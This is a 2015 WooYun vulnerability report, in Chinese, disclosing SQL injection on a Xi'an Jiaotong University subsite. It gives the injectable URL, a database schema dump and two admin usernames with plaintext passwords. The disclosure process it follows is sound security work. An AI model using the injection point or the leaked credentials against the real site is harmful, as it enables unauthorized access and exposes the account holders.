当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123026

漏洞标题:西安交通大学分站SQL注入漏洞

相关厂商:西安交通大学

漏洞作者: 路人甲

提交时间:2015-08-10 14:22

修复时间:2015-09-24 15:52

公开时间:2015-09-24 15:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经确认,细节仅向厂商公开
2015-08-20: 细节向核心白帽子及相关领域专家公开
2015-08-30: 细节向普通白帽子公开
2015-09-09: 细节向实习白帽子公开
2015-09-24: 细节向公众公开

简要描述:

可能造成信息泄漏!

详细说明:

注入地址:

http://jxjc.xjtu.edu.cn/website/news.php?id=100327


1.png


3.png


网站密码明文存储

2.png

漏洞证明:

Database: webdata
[6 tables]
+---------------------------------------+
| adminuser |
| art_type |
| article |
| lab_info |
| self_menulist |
| user_role |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: webdata
Table: art_type
[2 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| id | int(11) |
| type_name | varchar(255) |
+-----------+--------------+
Database: webdata
Table: lab_info
[13 columns]
+----------------+----------------+
| Column | Type |
+----------------+----------------+
| flag | tinyint(4) |
| id | int(11) |
| lab_admin | varchar(1924) |
| lab_contract | varchar(1024) |
| lab_device | varchar(10000) |
| lab_function | varchar(10000) |
| lab_map | varchar(255) |
| lab_name | varchar(255) |
| lab_web | varchar(1024) |
| last_mod_admin | varchar(255) |
| last_mod_time | timestamp |
| upload_admin | varchar(255) |
| upload_time | timestamp |
+----------------+----------------+
Database: webdata
Table: adminuser
[11 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| address | varchar(100) |
| contact1 | varchar(100) |
| contact2 | varchar(100) |
| email | varchar(100) |
| flag | smallint(6) |
| id | int(11) |
| password | varchar(20) |
| role | int(11) |
| truename | varchar(100) |
| user_unit | varchar(100) |
| username | varchar(100) |
+-----------+--------------+
Database: webdata
Table: user_role
[3 columns]
+------------+---------------+
| Column | Type |
+------------+---------------+
| id | int(11) |
| role_name | varchar(255) |
| role_table | varchar(1024) |
+------------+---------------+
Database: webdata
Table: self_menulist
[7 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| description | varchar(255) |
| id | int(11) |
| image | varchar(255) |
| menu_order | tinyint(4) |
| menuname | varchar(255) |
| p_id | smallint(6) |
| url | varchar(255) |
+-------------+--------------+
Database: webdata
Table: article
[25 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| abstract | varchar(500) |
| art_type | tinyint(4) |
| att_file1 | varchar(255) |
| att_file2 | varchar(255) |
| att_file3 | varchar(255) |
| att_file4 | varchar(255) |
| att_file5 | varchar(255) |
| att_name1 | varchar(255) |
| att_name2 | varchar(255) |
| att_name3 | varchar(255) |
| att_name4 | varchar(255) |
| att_name5 | varchar(255) |
| author | varchar(255) |
| content | text |
| first_flag | tinyint(4) |
| flag | tinyint(4) |
| id | int(11) |
| last_mod_admin | varchar(255) |
| last_mod_ip | varchar(255) |
| last_mod_time | timestamp |
| read_count | bigint(20) |
| title | varchar(500) |
| upload_admin | varchar(255) |
| upload_ip | varchar(255) |
| upload_time | timestamp |
+----------------+--------------+
-----+-----------+
| username | password |
+----------+-----------+
| admin | xjtunic |
| anng | ranbohehe |
+----------+-----------+

修复方案:

过滤吧!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-08-10 15:51

厂商回复:

通知用户处理中

最新状态:

暂无